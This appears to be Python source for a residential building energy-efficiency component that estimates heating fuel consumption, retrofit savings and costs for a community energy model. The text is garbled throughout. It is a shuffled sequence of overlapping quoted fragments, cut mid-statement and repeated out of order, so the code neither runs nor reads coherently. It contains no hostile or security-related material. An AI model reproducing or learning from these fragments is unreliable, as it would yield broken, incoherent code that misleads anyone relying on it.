forecast for a community diagnostics : diagnostics, optional diagnostics", "(gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential:", "baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption baseline_fuel_wood_consumption :", "df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname", "Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential: Net Benefit", "HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other msg = str(round(percent_accounted)) + \\", "EUI # the one in each of these function calls is an 
identity", "(1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate", "self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price']", "\\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\", "[mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the component output csv in", "if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name =", ".ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate", "self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in the", "np.nan elec_price = np.nan LP_price = np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF", "houses cf: float conversion factor Returns ------- float: fuel consumed for a type", "def calc_capital_costs (self): \"\"\"Calculate the capital costs. 
Attributes ---------- capital_costs : float total", "self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt", "Attributes ---------- opportunity_HH : int Houses that can be retrofit savings_HF : float", "Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat", "\"Residential: Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\",", "self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh", ": float initial electric consumption \"\"\" rd = self.comp_specs['data'] ## total consumption total", "per yer \"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost", "HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt,", "= self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption", "propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption : np.array baseline total", "constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate", "Attributes ---------- capital_costs : float total cost of improvements ($) \"\"\" self.capital_costs =", "\"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\",", "Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year)", "the total consumption Parameters 
---------- fuel_amnt: float % of fuel used total_consumption :", "consumption per yer \"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def", "self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created by the project Attributes", "= range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\", "scalers Attributes ---------- run : bool True in the component runs to completion,", "+ self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0]", "= self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def", "Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas", "Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating", "financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price", "\"Residential: Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df", "self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost = \\", "self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec = 
self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec =", "amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted", "self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption (self):", "---------- baseline_HF_cost : np.array baseline cost of heating fuels per year \"\"\" HF_price", "(self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\", "b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential: Heating", "1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH *", "\"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\",", "($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int)", "= b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec", "!= 'residential': self.was_run = False self.reason = \"Not a residential project.\" return #", "(cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential:", "total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other msg = str(round(percent_accounted)) +", "natural gas fuel consumption init_LP : float initial propane consumption init_kWh : float", "#~ self.init_solar #~ self.init_other msg = str(round(percent_accounted)) + \\ \" of residential fuel", "constants.mmbtu_to_gal_LP 
self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~", "consumption init_kWh : float initial electric consumption \"\"\" rd = self.comp_specs['data'] ## total", "* EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\", "self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption", "calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel costs Attributes ---------- baseline_HF_cost : np.array", "project Attributes ---------- init_HH : int estimated households for first year of project", "Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year)", "/ 100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt =", "float average electric consumption per household (kWh/year). 
>= 6000 \"\"\" # 500 average", "Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost", "b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost =", "Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural", "= np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords)", "= self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost -", "one in each of these function calls is an identity amnt = np.float64(rd[\"Fuel", "self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption *", "(1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by fuel from", "HF_price wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price']", "= self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price =", "init_HF : float initial heating oil consumption init_wood : float initial heating cordwood", "created by the project Attributes ---------- annual_heating_savings : np.array heating savings ($/year) \"\"\"", "/ 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords)", "== 0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other def calc_proposed_kWh_consumption (self): 
\"\"\"calculate the", "s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost", "(self): \"\"\"Set columns in the the forecast to values calculated in this component", "(gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural", "self.reason = \"OK\" tag = self.cd['file id'].split('+') if len(tag) > 1 and tag[1]", "r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost", "r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost", "= self.cd['natural gas price'] else: HF_price = np.nan wood_price = np.nan elec_price =", "Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost,", "self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt =", "self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created by the", "self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption", "the the forecast to values calculated in this component \"\"\" years = range(self.start_year,self.end_year)", "\\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in the the forecast to values", "r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price", "self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other def calc_proposed_kWh_consumption", "elec_price = self.cd[\"electric prices\"]\\ 
.ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas", "HF_price + \\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption * gas_price + \\", "* self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0", "Notes ----- Accepted scalers: capital costs. \"\"\" self.was_run = True self.reason = \"OK\"", "self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt =", "= self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created by", "This module estimates the potential improvements to heating efficiency of residential buildings (homes).", "avg_con = float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data is None: avg_con =", "consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption baseline_fuel_wood_consumption : np.array baseline", "produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self):", "That's where the 6000.0 # comes from. con_threshold = self.comp_specs['min kWh per household']", "rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit", "\"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\",", "Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\":", "+ \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\", "consumption for each fuel type. 
Attributes ---------- init_HF : float initial heating oil", "Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\",", "float savings in heating oil consumption savings_wood : float savings in heating cordwood", "\"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in", "costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel", "100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"])", ") ## % as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64(", "= area * EUI # the one in each of these function calls", "saved. Returns ------- float the total fuel saved in gallons \"\"\" base_heat =", "for electric or HF component and has a default value self.calc_avg_consumption() if self.cd[\"model", "Forecast Object aaem.diagnostics : diagnostics module, see information on Diagnostics Object \"\"\" def", "Consumption and savings are based on the number of units that have not", "self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self,", "\"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year)", "\"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural Gas", "- self.savings_mmbtu if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption = 0 # coal,solar,", "= df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_' +\\ 
self.component_name.lower() +", "constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0:", "The cost to retrofit each home is also calculated. Parameters ---------- community_data :", "(MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]", "Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption", "electric savings created by the project Attributes ---------- annual_electric_savings : np.array electric savings", "tracking error/warning messages prerequisites : dictionary of components, optional prerequisite component data \"\"\"", "Rate of Return will all be calculated. There must be a known Heat", "(cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat", "self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption", "b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost", "price'] == 0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate", "Residential Efficiency component body ------------------------------------- \"\"\" import numpy as np from pandas import", ": float initial propane consumption init_kWh : float initial electric consumption \"\"\" rd", "residential project.\" return # needed for electric or HF component and has a", "np.array baseline cost of electricity per year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric", "= self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] 
# kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption *", "Avg EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption", "= float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data is None: avg_con = self.intertie_data.get_item(", "float % of fuel used total_consumption : float total consumption for residential buildings", "self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel", "12 months in a year. That's where the 6000.0 # comes from. con_threshold", "True self.reason = \"OK\" tag = self.cd['file id'].split('+') if len(tag) > 1 and", "(avg_con < con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\"", "of the project Attributes ---------- init_HH : int estimated households for first year", "s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption", "($/year) are the difference in the base and proposed fuel costs \"\"\" self.annual_electric_savings", "Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP,", "also calculated. 
Parameters ---------- community_data : CommunityData CommunityData Object for a community forecast", "self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed", "\"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"]", "Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year)", "* (total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption", "gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption * wood_price", "bool True in the component runs to completion, False otherwise reason : string", "#~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices =", "amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH,", "self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio =", "+ \"_output.csv\") fname = fname.replace(\" \",\"_\") # save to end of project(actual lifetime)", "Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\":", "oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP", "annual_heating_savings : np.array heating savings 
($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost", "\"\"\" rd = self.comp_specs['data'] ## total consumption total = rd[\"Total Consumption (MMBtu)\"] +", "prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self):", "consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption : np.array proposed total electric", "Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption =", "b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost =", "a residential project.\" return # needed for electric or HF component and has", "* gas_price # coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes", "price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price +", "#~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings()", "Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post", "years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, 
self.baseline_HF_consumption) def", "comp_specs : dictionary component specific data for a community. Initial value: 'Residential Buildings'", "initial heating oil consumption init_wood : float initial heating cordwood consumption init_gas :", "community_data See also -------- aaem.community_data : community data module, see information on CommunityData", "Total Savings,Annual Costs, Annual Net Benefit, NPV Benefits, NPV Costs, NPV Net Benefits,", "of fuel used total_consumption : float total consumption for residential buildings HH :", "consumption init_LP : float initial propane consumption init_kWh : float initial electric consumption", "self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel", "reason : string lists reason for failure if run == False Notes -----", "to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating", "* \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh =", "Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas", "#~ self.init_other msg = str(round(percent_accounted)) + \\ \" of residential fuel sources accounted", "(self, community_data, forecast, diag = None, prerequisites = {}): \"\"\"Class initialiser Parameters ----------", "Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val", "os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\") #", "HF_price = np.nan wood_price = np.nan elec_price = np.nan LP_price = np.nan gas_price", "Consumption Post Retrofit\", 
\"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year)", "for a community diagnostics : diagnostics, optional diagnostics for tracking error/warning messages prerequisites", "(self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year]", "get_fuel_total_saved (self): \"\"\"Get total fuel saved. Returns ------- float the total fuel saved", "float initial natural gas fuel consumption init_LP : float initial propane consumption init_kWh", "(self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption", "self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel saved.", "\"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year)", "Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year)", "= ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average", "performance improvements as a percentage of the pre-retrofit consumption, and the forecasted price", "+= amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) /", "= self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH =", "b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural", "self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop = 
self.forecast.base_pop self.init_HH = int(round(HH*(val / pop)))", "\"\"\"Calculate the proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating", "self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~", "import numpy as np from pandas import DataFrame import os from aaem.components.annual_savings import", "HH : float a # of houses cf: float conversion factor Returns -------", "Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\":", "\"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the component output csv", "Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane", "for a community Attributes ---------- baseline_kWh_consumption : np.array electric consumption per yer \"\"\"", "= rd[\"Fuel Oil\"] / 100.0 HH = self.households #~ print HH area =", "not self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh", "self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost", "- self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price'] ==", "b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price", "fuel used total_consumption : float total consumption for residential buildings HH : float", "self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood 
self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption", "self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory,", "amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH,", "/ 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP)", "Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating", "\"Residential: Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential:", "Attributes ---------- proposed_HF_cost : np.array proposed heating fuel cost \"\"\" HF_price = (self.diesel_prices", "\\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption = 0", "self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) + self.start_year", "* (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh", "\\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption *", "+ \\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption", "= [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total 